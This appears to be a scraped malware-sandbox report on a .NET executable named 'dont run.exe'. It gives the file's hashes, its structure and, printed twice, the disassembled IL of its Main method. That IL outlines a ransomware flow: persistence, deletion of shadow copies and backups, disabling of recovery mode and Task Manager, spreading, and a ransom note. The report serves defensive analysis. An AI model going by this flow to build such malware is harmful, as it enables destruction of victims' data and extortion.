Suspicious
Suspect

0755481af91a2572406703ffb1766d65

PE Executable
|
MD5: 0755481af91a2572406703ffb1766d65
|
Size: 231.42 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
0755481af91a2572406703ffb1766d65
Sha1
760423ec9a2f9aecd79ba281b3a6092ba91d8acb
Sha256
0ccbedd3b8c898b3f9d063b9c702ed20ddb97df64a2e5c34b9e34be89ddbd100
Sha384
2e9f1f66b1acd569871707236d2acfe9019ee4f7c495325aff11f370cf3f697cbf734e43bc1976e0457d7926eec73d0d
Sha512
733fa2d4c9b6678e9de901758a5ecec5e3e2506cf5244bb1b72a73236ece87ab34aa19043490fd7fdc699d4ce35663ad0f6cd02943faafddf0800859d962fe44
SSDeep
3072:OQq91gb+rNGy2Q9cdv5vPGx66aVSwBRbddd7T3EwtMOxl8ykhtr+54wA3jC4IL:OQq9hrBIkxKdBbDdO+Azx
TLSH
4B34EE2529FA501DF2F3EE731BD8B59FD97EF6732A166469308103064622D42DD82B3B

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
0755481af91a2572406703ffb1766d65
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Module Name

dont run.exe
Full Name

dont run.exe
EntryPoint

System.Void ConsoleApplication7.Program::Main(System.String[])
Scope Name

dont run.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

dont run
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

387
Main Method

System.Void ConsoleApplication7.Program::Main(System.String[])
Main IL Instruction Count

65
Main IL

call System.Boolean ConsoleApplication7.Program::forbiddenCountry() brfalse.s IL_0013: call System.Boolean ConsoleApplication7.Program::RegistryValue() ldstr Forbidden Country call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> ret <null> call System.Boolean ConsoleApplication7.Program::RegistryValue() brfalse.s IL_0041: call System.Boolean ConsoleApplication7.Program::isOver() ldsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 brtrue.s IL_0032: ldsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 ldnull <null> ldftn System.Void ConsoleApplication7.Program::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 ldsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() call System.Boolean ConsoleApplication7.Program::isOver() brfalse.s IL_0049: call System.Boolean ConsoleApplication7.Program::AlreadyRunning() ret <null> call System.Boolean ConsoleApplication7.Program::AlreadyRunning() brfalse.s IL_0056: ldsfld System.Boolean ConsoleApplication7.Program::checkSleep ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.Boolean ConsoleApplication7.Program::checkSleep brfalse.s IL_0062: ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage call System.Void ConsoleApplication7.Program::sleepOutOfTempFolder() ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage brfalse.s IL_0075: ldsfld System.Boolean ConsoleApplication7.Program::checkCopyRoaming ldsfld System.String ConsoleApplication7.Program::processName call System.Void ConsoleApplication7.Program::copyResistForAdmin(System.String) br.s IL_0086: ldsfld System.Boolean ConsoleApplication7.Program::checkStartupFolder ldsfld System.Boolean ConsoleApplication7.Program::checkCopyRoaming brfalse.s IL_0086: ldsfld System.Boolean ConsoleApplication7.Program::checkStartupFolder ldsfld System.String ConsoleApplication7.Program::processName call System.Void ConsoleApplication7.Program::copyRoaming(System.String) ldsfld System.Boolean ConsoleApplication7.Program::checkStartupFolder brfalse.s IL_0092: ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage call System.Void ConsoleApplication7.Program::registryStartup() ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage brfalse.s IL_00D5: call System.Void ConsoleApplication7.Program::lookForDirectories() ldsfld System.Boolean ConsoleApplication7.Program::checkdeleteShadowCopies brfalse.s IL_00A5: ldsfld System.Boolean ConsoleApplication7.Program::checkdisableRecoveryMode call System.Void ConsoleApplication7.Program::deleteShadowCopies() ldsfld System.Boolean ConsoleApplication7.Program::checkdisableRecoveryMode brfalse.s IL_00B1: ldsfld System.Boolean ConsoleApplication7.Program::checkdeleteBackupCatalog call System.Void ConsoleApplication7.Program::disableRecoveryMode() ldsfld System.Boolean ConsoleApplication7.Program::checkdeleteBackupCatalog brfalse.s IL_00BD: ldsfld System.Boolean ConsoleApplication7.Program::disableTaskManager call System.Void ConsoleApplication7.Program::deleteBackupCatalog() ldsfld System.Boolean ConsoleApplication7.Program::disableTaskManager brfalse.s IL_00C9: ldsfld System.Boolean ConsoleApplication7.Program::checkStopBackupServices call System.Void ConsoleApplication7.Program::DisableTaskManager() ldsfld System.Boolean ConsoleApplication7.Program::checkStopBackupServices brfalse.s IL_00D5: call System.Void ConsoleApplication7.Program::lookForDirectories() call System.Void ConsoleApplication7.Program::stopBackupServices() call System.Void ConsoleApplication7.Program::lookForDirectories() ldsfld System.Boolean ConsoleApplication7.Program::checkSpread brfalse.s IL_00EB: call System.Void ConsoleApplication7.Program::addAndOpenNote() ldsfld System.String ConsoleApplication7.Program::spreadName call System.Void ConsoleApplication7.Program::spreadIt(System.String) call System.Void ConsoleApplication7.Program::addAndOpenNote() ldsfld System.String ConsoleApplication7.Program::base64Image call System.Void ConsoleApplication7.Program::SetWallpaper(System.String) ret <null>
Module Name

dont run.exe
Full Name

dont run.exe
EntryPoint

System.Void ConsoleApplication7.Program::Main(System.String[])
Scope Name

dont run.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

dont run
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

387
Main Method

System.Void ConsoleApplication7.Program::Main(System.String[])
Main IL Instruction Count

65
Main IL

call System.Boolean ConsoleApplication7.Program::forbiddenCountry() brfalse.s IL_0013: call System.Boolean ConsoleApplication7.Program::RegistryValue() ldstr Forbidden Country call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> ret <null> call System.Boolean ConsoleApplication7.Program::RegistryValue() brfalse.s IL_0041: call System.Boolean ConsoleApplication7.Program::isOver() ldsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 brtrue.s IL_0032: ldsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 ldnull <null> ldftn System.Void ConsoleApplication7.Program::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 ldsfld System.Threading.ThreadStart ConsoleApplication7.Program::CS$<>9__CachedAnonymousMethodDelegate1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() call System.Boolean ConsoleApplication7.Program::isOver() brfalse.s IL_0049: call System.Boolean ConsoleApplication7.Program::AlreadyRunning() ret <null> call System.Boolean ConsoleApplication7.Program::AlreadyRunning() brfalse.s IL_0056: ldsfld System.Boolean ConsoleApplication7.Program::checkSleep ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.Boolean ConsoleApplication7.Program::checkSleep brfalse.s IL_0062: ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage call System.Void ConsoleApplication7.Program::sleepOutOfTempFolder() ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage brfalse.s IL_0075: ldsfld System.Boolean ConsoleApplication7.Program::checkCopyRoaming ldsfld System.String ConsoleApplication7.Program::processName call System.Void ConsoleApplication7.Program::copyResistForAdmin(System.String) br.s IL_0086: ldsfld System.Boolean ConsoleApplication7.Program::checkStartupFolder ldsfld System.Boolean ConsoleApplication7.Program::checkCopyRoaming brfalse.s IL_0086: ldsfld System.Boolean ConsoleApplication7.Program::checkStartupFolder ldsfld System.String ConsoleApplication7.Program::processName call System.Void ConsoleApplication7.Program::copyRoaming(System.String) ldsfld System.Boolean ConsoleApplication7.Program::checkStartupFolder brfalse.s IL_0092: ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage call System.Void ConsoleApplication7.Program::registryStartup() ldsfld System.Boolean ConsoleApplication7.Program::checkAdminPrivilage brfalse.s IL_00D5: call System.Void ConsoleApplication7.Program::lookForDirectories() ldsfld System.Boolean ConsoleApplication7.Program::checkdeleteShadowCopies brfalse.s IL_00A5: ldsfld System.Boolean ConsoleApplication7.Program::checkdisableRecoveryMode call System.Void ConsoleApplication7.Program::deleteShadowCopies() ldsfld System.Boolean ConsoleApplication7.Program::checkdisableRecoveryMode brfalse.s IL_00B1: ldsfld System.Boolean ConsoleApplication7.Program::checkdeleteBackupCatalog call System.Void ConsoleApplication7.Program::disableRecoveryMode() ldsfld System.Boolean ConsoleApplication7.Program::checkdeleteBackupCatalog brfalse.s IL_00BD: ldsfld System.Boolean ConsoleApplication7.Program::disableTaskManager call System.Void ConsoleApplication7.Program::deleteBackupCatalog() ldsfld System.Boolean ConsoleApplication7.Program::disableTaskManager brfalse.s IL_00C9: ldsfld System.Boolean ConsoleApplication7.Program::checkStopBackupServices call System.Void ConsoleApplication7.Program::DisableTaskManager() ldsfld System.Boolean ConsoleApplication7.Program::checkStopBackupServices brfalse.s IL_00D5: call System.Void ConsoleApplication7.Program::lookForDirectories() call System.Void ConsoleApplication7.Program::stopBackupServices() call System.Void ConsoleApplication7.Program::lookForDirectories() ldsfld System.Boolean ConsoleApplication7.Program::checkSpread brfalse.s IL_00EB: call System.Void ConsoleApplication7.Program::addAndOpenNote() ldsfld System.String ConsoleApplication7.Program::spreadName call System.Void ConsoleApplication7.Program::spreadIt(System.String) call System.Void ConsoleApplication7.Program::addAndOpenNote() ldsfld System.String ConsoleApplication7.Program::base64Image call System.Void ConsoleApplication7.Program::SetWallpaper(System.String) ret <null>
0755481af91a2572406703ffb1766d65 (231.42 KB)
File Structure
0755481af91a2572406703ffb1766d65
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙